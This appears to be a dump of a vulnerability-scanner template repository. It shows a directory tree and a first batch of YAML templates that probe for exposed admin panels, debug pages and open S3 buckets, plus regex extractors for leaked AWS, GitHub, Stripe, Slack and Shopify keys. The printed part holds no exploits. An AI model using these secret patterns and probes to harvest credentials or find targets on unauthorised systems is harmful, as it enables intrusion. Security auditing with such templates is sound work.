├── .gitattributes
├── expired-ssl.yaml
├── S3Hunter.yaml
├── crxde.yaml
├── file-scheme.yaml
├── api
├── pictatic-api-key.yaml
├── twilio-api.yaml
├── mailgun-api.yaml
├── slack-api.yaml
├── google-api.yaml
├── mailchimp-api.yaml
├── sendgrid-api.yaml
├── stripe-api-key.yaml
├── picatic-api-key.yaml
├── newrelic-rest-api-key.yaml
├── newrelic-admin-api-key.yaml
├── strapi-admin-exposure.yaml
├── wsdl-api.yaml
├── mailchimp-api-key.yaml
├── sendgrid-api-key.yaml
├── artifactory-api-token.yaml
├── google-api-key.yaml
├── artifactory-api-password.yaml
├── zapier-webhook-token.yaml
├── api-c99.yaml
├── api-fastly.yaml
├── strapi-panel.yaml
└── strapi-page.yaml
├── content-scheme.yaml
├── shopify-token.yaml
├── debug-enabled.yaml
├── debug-pprof.yaml
├── git
├── github-app-token.yaml
├── github-oauth-token.yaml
├── github-personal-token.yaml
├── github-refresh-token.yaml
├── gitlab-ci.yaml
└── github-enterprise-detect.yaml
├── home-assistant.yaml
├── shopify-shared-secret.yaml
├── aws
├── aws-access-id.yaml
└── aws-access-key-value.yaml
├── crxde-lite.yaml
├── shopify-custom-token.yaml
├── shopify-private-token.yaml
├── square-oauth-secret.yaml
├── dynatrace-token.yaml
├── jmx-console.yaml
├── linkedin-id.yaml
├── webview-load-url.yaml
├── gcp-service-account.yaml
├── e-vulnerability
├── ds-store-leak.yaml
├── ikuai-login-panel.yaml
├── myucms-lfr.yaml
├── web-config.yaml
├── svn-leak.yaml
├── wordpress-wpconfig-inclosure.yaml
├── kingsoft-v8-rce.yaml
├── thinkcmf-lfi.yaml
├── sangfor-vpn-supersession-rce.yaml
├── yyoa-a6-userinfo-disclosure.yaml
├── natshell-arbitrary-file-read.yaml
├── dedecms-url-redirection.yaml
├── docker-registry.yaml
├── consul-rexec-rce.yaml
├── duomicms-sqli.yaml
├── fangweicms-sqli.yaml
├── maccms-rce.yaml
├── msvod-sqli.yaml
└── nuuo-file-inclusion.yaml
├── facebook-client-id.yaml
├── facebook-secret.yaml
├── a-fingerprinting
├── grafana-detect.yaml
├── druid-panel.yaml
├── nacos-detect.yaml
├── solarwinds-orion-panel.yaml
├── spring-detect.yaml
├── django-admin-panel.yaml
├── sonicwall-management-panel.yaml
├── minio-browser.yaml
├── thinkphp-detect.yaml
├── wayos-panel.yaml
├── azure-kubernetes-service.yaml
├── landray-oa-panel.yaml
├── sonicwall-sslvpn-panel.yaml
├── zentao-detect.yaml
└── mongodb-ops-manager.yaml
├── citrix-vpn-detect.yaml
├── cloudinary.yaml
├── credentials.yaml
├── flowci-detection.yaml
├── mongo-express-web-gui.yaml
├── samba-swat-panel.yaml
├── call-break-cms.yaml
├── certificate-validation.yaml
├── cockpit-detect.yaml
├── compal.yaml
├── couchdb-fauxton.yaml
├── cx-cloud-login.yaml
├── deadbolt-ransomware.yaml
├── flink-exposure.yaml
├── rabbitmq-dashboard.yaml
├── redash-detection.yaml
├── bitly-secret-key.yaml
├── kafka-connect-ui.yaml
├── slack-bot-token.yaml
├── hadoop-exposure.yaml
├── paypal-braintree-token.yaml
├── webview-javascript.yaml
├── wordpress
├── wp-xmlrpc.yaml
└── wordpress-duplicator-path-traversal.yaml
├── kubernetes
└── kubernetes-dashboard.yaml
├── mantis-detect.yaml
├── slack-user-token.yaml
├── slack-webhook.yaml
├── x-hacker.yaml
├── aims-password-mgmt-client.yaml
├── biometric-detect.yaml
├── kafka-topics-ui.yaml
├── kronos-workforce-central.yaml
├── maian-cart-detect.yaml
├── newrelic-insights-key.yaml
├── rocketmq-console-exposure.yaml
├── s3-detect.yaml
├── smtp-detection.yaml
├── square-access-token.yaml
├── supervpn-panel.yaml
├── webview-universal-access.yaml
├── X-Host.yaml
├── compal-panel.yaml
├── easyredir.yaml
├── firebase-database.yaml
├── solarwinds-orion.yaml
├── sonarqube-login.yaml
├── sql-server-reporting.yaml
├── zipkin-exposure.yaml
├── basic-cors-flash.yaml
├── jwt-token.yaml
├── kafka-monitoring.yaml
├── sonicwall-sslvpn-panel.yaml
├── stridercd-detection.yaml
├── stripe-secret-key.yaml
├── twitter-secret.yaml
├── unauthenticated-lansweeper.yaml
├── vm
├── vmware-vcenter-lfi-linux.yaml
├── saferoads-vms-login.yaml
└── vmware-horizon.yaml
├── yopass-panel.yaml
├── amazon-sns-token.yaml
├── amazon-sns-topic.yaml
├── argocd-detect.yaml
├── bazarr-login.yaml
├── exposed-pagespeed-global-admin.yaml
├── oauth-access-key.yaml
├── parallels-html-client.yaml
├── urge-takeover.yaml
├── webview-addjavascript-interface.yaml
├── X-Client-IP.yaml
├── branch-key.yaml
├── manage-engine-admanager-panel.yaml
├── sonarqube-token.yaml
├── stripe-restricted-key.yaml
├── surge-takeover.yaml
├── versa-sdwan.yaml
├── werkzeug-debugger-detect.yaml
├── bmc-panel-detect.yaml
├── jkstatus-manager.yaml
├── kinsta-takeover.yaml
├── X-Remote-Addr.yaml
├── cve
├── 2007
│ └── CNVD-200705-315.yaml
├── 2015
│ └── CVE-2015-7297.yaml
├── 2017
│ ├── CVE-2017-16877.yaml
│ ├── CVE-2017-8917.yaml
│ └── CVE-2017-1000028.yaml
├── 2018
│ ├── CVE-2018-12613.yaml
│ ├── CVE-2018-7490.yaml
│ └── CVE-2018-10736.yaml
├── 2019
│ ├── CNVD-2019-16798.yaml
│ ├── CVE-2019-18394.yaml
│ └── CVE-2019-11510.yaml
├── 2020
│ ├── CNVD-2020-57264.yaml
│ └── CVE-2020-5515.yaml
├── 2021
│ ├── CVE-2021-29622.yaml
│ └── CNVD-2021-10543.yaml
└── 2022
│ └── CVE-2022-33891.yaml
├── discord-webhook.yaml
├── httpbin-detection.yaml
├── jdbc-connection-string.yaml
├── x-forwarded-for.yaml
├── b-disclosure
└── hadoop-disclosure.yaml
├── c-unauthorized
├── frp-unauthenticated.yaml
├── kibana-unauth.yaml
├── jeecg-boot.yaml
├── ruoyi-druid-unauth.yaml
├── airflow-unauth.yaml
└── spark-api-unauth.yaml
├── circleci.yaml
├── dynamic-broadcast-receiver.yaml
├── google
├── google-storage.yaml
├── google-mapsembed.yaml
├── google-calendar-link.yaml
├── google-staticmaps.yaml
└── google-mapsembedadvanced.yaml
├── jazzhr-takeover.yaml
├── mashery-takeover.yaml
├── newrelic-synthetics-location-key.yaml
├── prometheus-exposed-panel.yaml
├── provider-path.yaml
├── selenoid-ui-exposure.yaml
├── smugmug-takeover.yaml
├── surveygizmo-takeover.yaml
├── tave-takeover.yaml
├── ansible-config-disclosure.yaml
├── dotcms-admin-panel.yaml
├── fastly-takeover.yaml
├── hatenablog-takeover.yaml
├── lazy-file.yaml
├── readme-takeover.yaml
├── server-status.yaml
├── traefik-dashboard.yaml
├── webmin
└── webmin-panel.yaml
├── zendesk-takeover.yaml
├── druid-console-exposure.yaml
├── electron-version-detect.yaml
├── exposed-webalizer.yaml
├── feedpress-takeover.yaml
├── gemfury-takeover.yaml
├── memcached-stats.yaml
├── readthedocs-takeover.yaml
├── smartling-takeover.yaml
├── teamwork-takeover.yaml
├── zoho-webhook-token.yaml
├── agilecrm-takeover.yaml
├── aha-takeover.yaml
├── braintree-access-token.yaml
├── cloudinary-credentials.yaml
├── empirecms-detect.yaml
├── hmc-hybris-panel.yaml
├── pentaho-panel.yaml
├── perl-status.yaml
├── sap-router.yaml
├── struts-debug-mode.yaml
├── symfony
├── symfony-detect.yaml
├── symfony-phpinfo.yaml
├── sqli-symfony.yaml
└── symfony-profiler.yaml
├── vend-takeover.yaml
├── zentral-detection.yaml
├── checkmarx-panel.yaml
├── drupal
└── drupal-install.yaml
├── helpjuice-takeover.yaml
├── jiva-admin-exposure.yaml
├── netscalar-aaa-login.yaml
├── sonicwall-management-panel.yaml
├── wishpond-takeover.yaml
├── X-Remote-IP.yaml
├── airflow-configuration-exposure.yaml
├── apache
├── apache-dubbo-detect.yaml
├── default-tomcat-page.yaml
└── public-tomcat-instance.yaml
├── cx-cloud-upload-detect.yaml
├── default-iis7-page.yaml
├── emqx-detection.yaml
├── fcm-server-key.yaml
├── hashicorp-consul-version.yaml
├── jetbrains-takeover.yaml
├── unbounce-takeover.yaml
├── wangshen-file.yaml
├── Airflow-unauthorized.yaml
├── airee-takeover.yaml
├── cx-cloud-login-1.yaml
├── elmah-log-file.yaml
├── gradle-enterprise-build-cache-detect.yaml
├── helpscout-takeover.yaml
├── misconfigured-concrete5.yaml
├── network-camera-detect.yaml
├── ngrok-takeover.yaml
├── rails-debug-mode.yaml
├── slack-webhook-token.yaml
├── somfy-login.yaml
├── amazon-mws-auth-token.yaml
├── citrix-adc-gateway-detect.yaml
├── cx-cloud-login-2.yaml
├── exposed-kafdrop.yaml
├── fanruanoa2012-detect.yaml
├── find-config.xml copy.yaml
├── hashicorp-vault-detect.yaml
├── jspxcms-detect.yaml
├── lancom-router-panel.yaml
├── leostream-detection.yaml
├── openweather.yaml
├── pbootcms-detect.yaml
├── rstudio-detect.yaml
├── sap-hana-xsengine-panel.yaml
├── saprouter-detect.yaml
├── totemomail-smtp-detect.yaml
├── buttercms.yaml
├── default-movable-page.yaml
├── django
└── django-admin-panel.yaml
├── entrust-identityguard.yaml
├── expn-mail-detect.yaml
├── harbor-detect.yaml
├── pantheon-takeover.yaml
├── uberflip-takeover.yaml
├── wakatime.yaml
├── amazon-docker-config.yaml
├── brightcove-takeover.yaml
├── d-default-pwd
├── mofi4500-default-password.yaml
└── ns-icg-default-password.yaml
├── defectdojo-panel.yaml
├── fortinet-fortigate-panel.yaml
├── gerapy-detect.yaml
├── laravel-debug-error.yaml
├── netlify-cms.yaml
├── simplebooklet-takeover.yaml
├── xenforo-login.yaml
├── anima-takeover.yaml
├── extract-firebase-database.yaml
├── kafka-center-login.yaml
├── sophos-mobile-panel-detection.yaml
├── stripe.yaml
├── wildcard-postmessage.yaml
├── aspnuke-openredirect.yaml
├── clave-login-panel.yaml
├── default-jetty-page.yaml
├── druid-monitor.yaml
├── getresponse-takeover.yaml
├── ipstack.yaml
├── java-rmi-detect.yaml
├── livezilla-login-panel.yaml
├── myucms-lfr.yaml
├── sharecenter-login.yaml
├── xxljob-admin-detect.yaml
├── basic-auth-detection.yaml
├── dreambox-detect.yaml
├── ems-login-panel.yaml
├── instagram.yaml
├── jaspersoft-detect.yaml
├── lokalise.yaml
├── microsoft-teams-webhook.yaml
├── octoprint-login.yaml
├── openerp-database.yaml
├── sap-netweaver-portal.yaml
├── valid-gmail-check.yaml
├── webflow-takeover.yaml
├── wufoo-takeover.yaml
├── zenario-login-panel.yaml
├── aftership-takeover.yaml
├── amazon-docker-config-disclosure.yaml
├── calendly.yaml
├── code42-panel.yaml
├── crush-ftp-detect.yaml
├── edgeos-login.yaml
├── fuelcms-panel.yaml
├── hivemanager-login-panel.yaml
├── jira-unauthenticated-projects.yaml
├── mapbox.yaml
├── medium-takeover.yaml
├── netscaler-aaa-login.yaml
├── php
├── phpmyadmin-panel-1.yaml
├── phpmyadmin-panel-3.yaml
├── phpmyadmin-panel-10.yaml
├── phpmyadmin-panel-11.yaml
├── phpmyadmin-panel-2.yaml
├── phpmyadmin-panel-6.yaml
├── phpmyadmin-panel-7.yaml
├── phpmyadmin-panel-8.yaml
└── phpmyadmin-panel-9.yaml
├── proposify-takeover.yaml
├── ricoh-pro8320-webserver.yaml
├── shiro-detect.yaml
├── starttls-mail-detect.yaml
├── CRMEB-sqli.yaml
├── asana.yaml
├── exposed-hg.yaml
├── exsi-system.yaml
├── frontify-takeover.yaml
├── gradle-enterprise-panel.yaml
├── node-red-detect.yaml
├── npm-log-file.yaml
├── oracle-dbass-detect.yaml
├── securenvoy-panel.yaml
├── workspace-one-uem.yaml
├── zipkin-exposure-1.yaml
├── adfs-detect.yaml
├── contacam.yaml
├── default-fastcgi-page.yaml
├── default-openresty.yaml
├── dotclear-detect.yaml
├── firebase-detect.yaml
├── froxlor-detect.yaml
├── jfrog.yaml
├── jira-unauthenticated-user-picker.yaml
├── mailgun.yaml
├── pingdom-takeover.yaml
├── powerlogic-ion.yaml
├── puppetboard-panel.yaml
├── spotify.yaml
├── synnefo-admin-panel.yaml
└── vercel-takeover.yaml
/.gitattributes:
--------------------------------------------------------------------------------
1 | # Auto detect text files and perform LF normalization
2 | * text=auto
3 |
--------------------------------------------------------------------------------
/expired-ssl.yaml:
--------------------------------------------------------------------------------
1 | id: expired-ssl
2 |
3 | info:
4 | name: Expired SSL Certificate
5 | author: pdteam
6 | severity: low
7 | tags: ssl
8 |
9 | ssl:
10 | - address: "{{Host}}:{{Port}}"
11 | matchers:
12 | - type: dsl
13 | dsl:
14 | - "unixtime() > not_after"
15 |
--------------------------------------------------------------------------------
/S3Hunter.yaml:
--------------------------------------------------------------------------------
1 | id: s3-hunter
2 |
3 | info:
4 | name: Hunts for unreferenced AWS S3 Buckets
5 | author: glatisant
6 | severity: medium
7 | requests:
8 | - method: GET
9 | path:
10 | - '{{BaseURL}}'
11 | matchers:
12 | - type: word
13 | words:
14 | - 'ListBucketResult'
--------------------------------------------------------------------------------
/crxde.yaml:
--------------------------------------------------------------------------------
1 | id: crxde
2 |
3 | info:
4 | name: CRXDE Lite
5 | author: nadino
6 | severity: info
7 |
8 | requests:
9 | - method: GET
10 | path:
11 | - "{{BaseURL}}/crx/de/index.jsp"
12 | matchers:
13 | - type: word
14 | words:
15 | - "
CRXDE Lite"
16 |
--------------------------------------------------------------------------------
/file-scheme.yaml:
--------------------------------------------------------------------------------
1 | id: file-scheme
2 |
3 | info:
4 | name: File Scheme Enabled
5 | author: gaurang
6 | severity: info
7 | tags: android,file
8 |
9 | file:
10 | - extensions:
11 | - xml
12 |
13 | matchers:
14 | - type: word
15 | words:
16 | - "android:scheme=\"file\""
--------------------------------------------------------------------------------
/api/pictatic-api-key.yaml:
--------------------------------------------------------------------------------
1 | id: pictatic-api-key
2 |
3 | info:
4 | name: Pictatic API Key
5 | author: gaurang
6 | severity: high
7 | tags: token,file
8 |
9 | file:
10 | - extensions:
11 | - all
12 |
13 | extractors:
14 | - type: regex
15 | regex:
16 | - "sk_live_[0-9a-z]{32}"
--------------------------------------------------------------------------------
/api/twilio-api.yaml:
--------------------------------------------------------------------------------
1 | id: twilio-api
2 |
3 | info:
4 | name: Twilio API Key
5 | author: gaurang
6 | severity: high
7 | tags: token,file
8 |
9 | file:
10 | - extensions:
11 | - all
12 |
13 | extractors:
14 | - type: regex
15 | regex:
16 | - "(?i)twilio(.{0,20})?SK[0-9a-f]{32}"
--------------------------------------------------------------------------------
/content-scheme.yaml:
--------------------------------------------------------------------------------
1 | id: content-scheme
2 |
3 | info:
4 | name: Content Scheme Enabled
5 | author: gaurang
6 | severity: info
7 | tags: android,file
8 |
9 | file:
10 | - extensions:
11 | - xml
12 |
13 | matchers:
14 | - type: word
15 | words:
16 | - "android:scheme=\"content\""
--------------------------------------------------------------------------------
/shopify-token.yaml:
--------------------------------------------------------------------------------
1 | id: shopify-access-token
2 |
3 | info:
4 | name: Shopify Access Token
5 | author: gaurang
6 | severity: high
7 | tags: token,file
8 |
9 | file:
10 | - extensions:
11 | - all
12 |
13 | extractors:
14 | - type: regex
15 | regex:
16 | - "shpat_[a-fA-F0-9]{32}"
--------------------------------------------------------------------------------
/api/mailgun-api.yaml:
--------------------------------------------------------------------------------
1 | id: mailgun-api-key
2 |
3 | info:
4 | name: Mailgun API Key
5 | author: gaurang
6 | severity: high
7 | tags: token,file,mailgun
8 |
9 | file:
10 | - extensions:
11 | - all
12 |
13 | extractors:
14 | - type: regex
15 | regex:
16 | - "key-[0-9a-zA-Z]{32}"
17 |
--------------------------------------------------------------------------------
/api/slack-api.yaml:
--------------------------------------------------------------------------------
1 | id: slack-api
2 |
3 | info:
4 | name: Slack API Key
5 | author: gaurang
6 | severity: high
7 | tags: token,file,slack
8 |
9 | file:
10 | - extensions:
11 | - all
12 |
13 | extractors:
14 | - type: regex
15 | regex:
16 | - "xox[baprs]-([0-9a-zA-Z]{10,48})?"
17 |
--------------------------------------------------------------------------------
/debug-enabled.yaml:
--------------------------------------------------------------------------------
1 | id: android-debug-enabled
2 |
3 | info:
4 | name: Android Debug Enabled
5 | author: gaurang
6 | severity: low
7 | tags: android,file
8 |
9 | file:
10 | - extensions:
11 | - all
12 |
13 | matchers:
14 | - type: regex
15 | regex:
16 | - "android:debuggable=\"true\""
--------------------------------------------------------------------------------
/debug-pprof.yaml:
--------------------------------------------------------------------------------
1 | id: debug-pprof
2 |
3 | info:
4 | name: pprof debug file
5 | author: pdteam
6 | severity: low
7 |
8 | requests:
9 | - method: GET
10 | path:
11 | - "{{BaseURL}}/debug/pprof/"
12 | matchers:
13 | - type: word
14 | words:
15 | - "Types of profiles available"
16 |
--------------------------------------------------------------------------------
/git/github-app-token.yaml:
--------------------------------------------------------------------------------
1 | id: github-app-token
2 |
3 | info:
4 | name: Github App Token
5 | author: tanq16
6 | severity: medium
7 | tags: token,file,github
8 |
9 | file:
10 | - extensions:
11 | - all
12 |
13 | extractors:
14 | - type: regex
15 | regex:
16 | - "gh[us]_.{36}"
17 |
--------------------------------------------------------------------------------
/home-assistant.yaml:
--------------------------------------------------------------------------------
1 | id: home-assistant
2 |
3 | info:
4 | name: Detect Home Assistant
5 | author: fabaff
6 | severity: info
7 |
8 | requests:
9 | - method: GET
10 | path:
11 | - "{{BaseURL}}"
12 | matchers:
13 | - type: word
14 | words:
15 | - "Home Assistant"
16 |
--------------------------------------------------------------------------------
/api/google-api.yaml:
--------------------------------------------------------------------------------
1 | id: google-api-key-file
2 |
3 | info:
4 | name: Google API key
5 | author: gaurang
6 | severity: info
7 | tags: token,file,google
8 |
9 | file:
10 | - extensions:
11 | - all
12 |
13 | extractors:
14 | - type: regex
15 | regex:
16 | - "AIza[0-9A-Za-z\\-_]{35}"
17 |
--------------------------------------------------------------------------------
/git/github-oauth-token.yaml:
--------------------------------------------------------------------------------
1 | id: github-oauth-token
2 |
3 | info:
4 | name: Github OAuth Access Token
5 | author: tanq16
6 | severity: high
7 | tags: token,file,github
8 |
9 | file:
10 | - extensions:
11 | - all
12 |
13 | extractors:
14 | - type: regex
15 | regex:
16 | - "gho_.{36}"
17 |
--------------------------------------------------------------------------------
/git/github-personal-token.yaml:
--------------------------------------------------------------------------------
1 | id: github-personal-token
2 |
3 | info:
4 | name: Github Personal Token
5 | author: geeknik
6 | severity: high
7 | tags: token,file
8 |
9 | file:
10 | - extensions:
11 | - all
12 |
13 | extractors:
14 | - type: regex
15 | regex:
16 | - "ghp_.{36}"
17 |
--------------------------------------------------------------------------------
/git/github-refresh-token.yaml:
--------------------------------------------------------------------------------
1 | id: github-refresh-token
2 |
3 | info:
4 | name: Github Refresh Token
5 | author: tanq16
6 | severity: high
7 | tags: token,file,github
8 |
9 | file:
10 | - extensions:
11 | - all
12 |
13 | extractors:
14 | - type: regex
15 | regex:
16 | - "ghr_.{36}"
17 |
--------------------------------------------------------------------------------
/shopify-shared-secret.yaml:
--------------------------------------------------------------------------------
1 | id: shopify-shared-secret
2 |
3 | info:
4 | name: Shopify Shared Secret
5 | author: gaurang
6 | severity: high
7 | tags: token,file
8 |
9 | file:
10 | - extensions:
11 | - all
12 |
13 | extractors:
14 | - type: regex
15 | regex:
16 | - "shpss_[a-fA-F0-9]{32}"
--------------------------------------------------------------------------------
/aws/aws-access-id.yaml:
--------------------------------------------------------------------------------
1 | id: aws-access-key
2 |
3 | info:
4 | name: AWS Access Key ID
5 | author: gaurang
6 | severity: low
7 |
8 | file:
9 | - extensions:
10 | - all
11 |
12 | extractors:
13 | - type: regex
14 | regex:
15 | - "(A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}"
16 |
--------------------------------------------------------------------------------
/api/mailchimp-api.yaml:
--------------------------------------------------------------------------------
1 | id: mailchimp-api-key
2 |
3 | info:
4 | name: Mailchimp API Key
5 | author: gaurang
6 | severity: high
7 | tags: token,file,mailchimp
8 |
9 | file:
10 | - extensions:
11 | - all
12 |
13 | extractors:
14 | - type: regex
15 | regex:
16 | - "[0-9a-f]{32}-us[0-9]{1,2}"
17 |
--------------------------------------------------------------------------------
/crxde-lite.yaml:
--------------------------------------------------------------------------------
1 | id: crxde-lite
2 |
3 | info:
4 | name: CRXDE Lite
5 | author: nadino
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - "{{BaseURL}}/crx/de/index.jsp"
13 | matchers:
14 | - type: word
15 | words:
16 | - "CRXDE Lite"
17 |
--------------------------------------------------------------------------------
/shopify-custom-token.yaml:
--------------------------------------------------------------------------------
1 | id: shopify-custom-token
2 |
3 | info:
4 | name: Shopify Custom App Access Token
5 | author: gaurang
6 | severity: high
7 | tags: token,file
8 |
9 | file:
10 | - extensions:
11 | - all
12 |
13 | extractors:
14 | - type: regex
15 | regex:
16 | - "shpca_[a-fA-F0-9]{32}"
--------------------------------------------------------------------------------
/shopify-private-token.yaml:
--------------------------------------------------------------------------------
1 | id: shopify-private-token
2 |
3 | info:
4 | name: Shopify Private App Access Token
5 | author: gaurang
6 | severity: high
7 | tags: token,file
8 |
9 | file:
10 | - extensions:
11 | - all
12 |
13 | extractors:
14 | - type: regex
15 | regex:
16 | - "shppa_[a-fA-F0-9]{32}"
--------------------------------------------------------------------------------
/square-oauth-secret.yaml:
--------------------------------------------------------------------------------
1 | id: square-oauth-secret
2 |
3 | info:
4 | name: Square OAuth Secret
5 | author: gaurang
6 | severity: high
7 | tags: token,file,square
8 |
9 | file:
10 | - extensions:
11 | - all
12 |
13 | extractors:
14 | - type: regex
15 | regex:
16 | - "sq0csp-[0-9A-Za-z\\-_]{43}"
17 |
--------------------------------------------------------------------------------
/dynatrace-token.yaml:
--------------------------------------------------------------------------------
1 | id: dynatrace-token
2 |
3 | info:
4 | name: Dynatrace Token
5 | author: gaurang
6 | severity: high
7 | tags: token,file
8 |
9 | file:
10 | - extensions:
11 | - all
12 |
13 | extractors:
14 | - type: regex
15 | regex:
16 | - "dt0[a-zA-Z]{1}[0-9]{2}\\.[A-Z0-9]{24}\\.[A-Z0-9]{64}"
--------------------------------------------------------------------------------
/jmx-console.yaml:
--------------------------------------------------------------------------------
1 | id: jmx-console
2 |
3 | info:
4 | name: JMX Console
5 | author: yashanand155
6 | severity: low
7 | tags: panel,jmx
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - '{{BaseURL}}/jmx-console/'
13 | matchers:
14 | - type: word
15 | words:
16 | - JBoss JMX Management Console
17 |
--------------------------------------------------------------------------------
/linkedin-id.yaml:
--------------------------------------------------------------------------------
1 | id: linkedin-client-id
2 |
3 | info:
4 | name: Linkedin Client ID
5 | author: gaurang
6 | severity: low
7 | tags: token,file,linkedin
8 |
9 | file:
10 | - extensions:
11 | - all
12 |
13 | extractors:
14 | - type: regex
15 | regex:
16 | - "(?i)linkedin(.{0,20})?(?-i)[0-9a-z]{12}"
17 |
--------------------------------------------------------------------------------
/api/sendgrid-api.yaml:
--------------------------------------------------------------------------------
1 | id: sendgrid-api-key-file
2 |
3 | info:
4 | name: Sendgrid API Key
5 | author: gaurang
6 | severity: high
7 | tags: token,file,sendgrid
8 |
9 | file:
10 | - extensions:
11 | - all
12 |
13 | extractors:
14 | - type: regex
15 | regex:
16 | - "SG\\.[a-zA-Z0-9]{22}\\.[a-zA-Z0-9]{43}"
17 |
--------------------------------------------------------------------------------
/api/stripe-api-key.yaml:
--------------------------------------------------------------------------------
1 | id: stripe-api-key
2 |
3 | info:
4 | name: Stripe API Key
5 | author: gaurang
6 | severity: high
7 | tags: token,file,stripe
8 |
9 | file:
10 | - extensions:
11 | - all
12 |
13 | extractors:
14 | - type: regex
15 | regex:
16 | - "(?i)stripe(.{0,20})?[sr]k_live_[0-9a-zA-Z]{24}"
17 |
--------------------------------------------------------------------------------
/webview-load-url.yaml:
--------------------------------------------------------------------------------
1 | id: webview-load-url
2 |
3 | info:
4 | name: Webview loadUrl usage
5 | author: gaurang
6 | severity: info
7 | tags: android,file
8 |
9 | file:
10 | - extensions:
11 | - all
12 |
13 | matchers:
14 | - type: word
15 | words:
16 | - "Landroid/webkit/WebView;->loadUrl(Ljava/lang/String;)V"
--------------------------------------------------------------------------------
/gcp-service-account.yaml:
--------------------------------------------------------------------------------
1 | id: gcp-service-account
2 |
3 | info:
4 | name: Google (GCP) Service-account
5 | author: gaurang
6 | severity: low
7 | tags: token,file,google
8 |
9 | file:
10 | - extensions:
11 | - all
12 |
13 | extractors:
14 | - type: regex
15 | regex:
16 | - "\"type\": \"service_account\""
17 |
--------------------------------------------------------------------------------
/e-vulnerability/ds-store-leak.yaml:
--------------------------------------------------------------------------------
1 | id: ds-store-leak
2 |
3 | info:
4 | name: Directory Listing via DS_Store
5 | author: 0w4ys
6 | severity: info
7 | verified: true
8 |
9 | rules:
10 | r0:
11 | request:
12 | method: GET
13 | path: /.DS_Store
14 | expression: response.status == 200 && response.body.bcontains(b'Bud1')
15 | expression: r0()
--------------------------------------------------------------------------------
/facebook-client-id.yaml:
--------------------------------------------------------------------------------
1 | id: facebook-client-id
2 |
3 | info:
4 | name: Facebook Client ID
5 | author: gaurang
6 | severity: info
7 | tags: token,file,facebook
8 |
9 | file:
10 | - extensions:
11 | - all
12 |
13 | extractors:
14 | - type: regex
15 | regex:
16 | - "(?i)(facebook|fb)(.{0,20})?['\"][0-9]{13,17}['\"]"
17 |
--------------------------------------------------------------------------------
/facebook-secret.yaml:
--------------------------------------------------------------------------------
1 | id: facebook-secret-key
2 |
3 | info:
4 | name: Facebook Secret Key
5 | author: gaurang
6 | severity: low
7 | tags: token,file,facebook
8 |
9 | file:
10 | - extensions:
11 | - all
12 |
13 | extractors:
14 | - type: regex
15 | regex:
16 | - "(?i)(facebook|fb)(.{0,20})?(?-i)['\"][0-9a-f]{32}['\"]"
17 |
--------------------------------------------------------------------------------
/a-fingerprinting/grafana-detect.yaml:
--------------------------------------------------------------------------------
1 | id: grafana-panel
2 |
3 | info:
4 | name: Grafana Panel
5 | author: organiccrap
6 | severity: info
7 | verified: true
8 |
9 | rules:
10 | r0:
11 | request:
12 | method: GET
13 | path: /login
14 | expression: response.status == 200 && response.body.bcontains(b'Grafana')
15 | expression: r0()
--------------------------------------------------------------------------------
/citrix-vpn-detect.yaml:
--------------------------------------------------------------------------------
1 | id: citrix-vpn-detect
2 |
3 | info:
4 | name: Citrix VPN Detection
5 | author: pdteam
6 | severity: info
7 | tags: panel,citrix
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - "{{BaseURL}}/vpn/index.html"
13 | matchers:
14 | - type: word
15 | words:
16 | - "Citrix Gateway"
17 |
--------------------------------------------------------------------------------
/cloudinary.yaml:
--------------------------------------------------------------------------------
1 | id: cloudinary-basic-auth
2 |
3 | info:
4 | name: Cloudinary Basic Auth
5 | author: gaurang
6 | severity: high
7 | tags: token,file,cloudinary
8 |
9 | file:
10 | - extensions:
11 | - all
12 |
13 | extractors:
14 | - type: regex
15 | regex:
16 | - "cloudinary://[0-9]{15}:[0-9A-Za-z\\-_]+@[0-9A-Za-z\\-_]+"
17 |
--------------------------------------------------------------------------------
/credentials.yaml:
--------------------------------------------------------------------------------
1 | id: basic-auth-creds
2 |
3 | info:
4 | name: Basic Auth Credentials
5 | author: gaurang
6 | severity: high
7 | tags: token,file,auth
8 |
9 | file:
10 | - extensions:
11 | - all
12 |
13 | extractors:
14 | - type: regex
15 | regex:
16 | - "[a-zA-Z]{3,10}://[^/\\s:@]{3,20}:[^/\\s:@]{3,20}@.{1,100}[\"'\\s]"
17 |
--------------------------------------------------------------------------------
/flowci-detection.yaml:
--------------------------------------------------------------------------------
1 | id: flowci-detection
2 |
3 | info:
4 | name: FlowCI Detection
5 | author: Adam Crosser
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - '{{BaseURL}}/'
13 | redirects: true
14 |
15 | matchers:
16 | - type: word
17 | words:
18 | - 'flow-web-x'
19 |
--------------------------------------------------------------------------------
/mongo-express-web-gui.yaml:
--------------------------------------------------------------------------------
1 | id: mongo-express-web-gui
2 |
3 | info:
4 | name: Mongo Express Web GUI
5 | author: puzzlepeaches
6 | severity: info
7 |
8 | requests:
9 | - method: GET
10 | path:
11 | - "{{BaseURL}}/"
12 | matchers:
13 | - type: word
14 | words:
15 | - "Set-Cookie: mongo-express="
16 | part: header
17 |
--------------------------------------------------------------------------------
/samba-swat-panel.yaml:
--------------------------------------------------------------------------------
1 | id: samba-swat-panel
2 |
3 | info:
4 | name: Samba SWAT panel
5 | author: PR3R00T
6 | severity: info
7 | tags: panel,samba
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - "{{BaseURL}}"
13 |
14 | matchers:
15 | - type: word
16 | words:
17 | - 'Basic realm="SWAT"'
18 | part: header
19 |
--------------------------------------------------------------------------------
/a-fingerprinting/druid-panel.yaml:
--------------------------------------------------------------------------------
1 | id: druid-panel
2 |
3 | info:
4 | name: Druid Panel
5 | author: zan8in
6 | severity: info
7 | verified: true
8 |
9 | rules:
10 | r0:
11 | request:
12 | method: GET
13 | path: /druid/login.html
14 | expression: response.status == 200 && response.body.bcontains(b'druid monitor')
15 | expression: r0()
--------------------------------------------------------------------------------
/api/picatic-api-key.yaml:
--------------------------------------------------------------------------------
1 | id: picatic-api-key
2 |
3 | info:
4 | name: Picatic API Key Disclosure
5 | author: Ice3man
6 | severity: info
7 | tags: exposure,token
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - "{{BaseURL}}"
13 | extractors:
14 | - type: regex
15 | part: body
16 | regex:
17 | - 'sk_live_[0-9a-z]{32}'
--------------------------------------------------------------------------------
/call-break-cms.yaml:
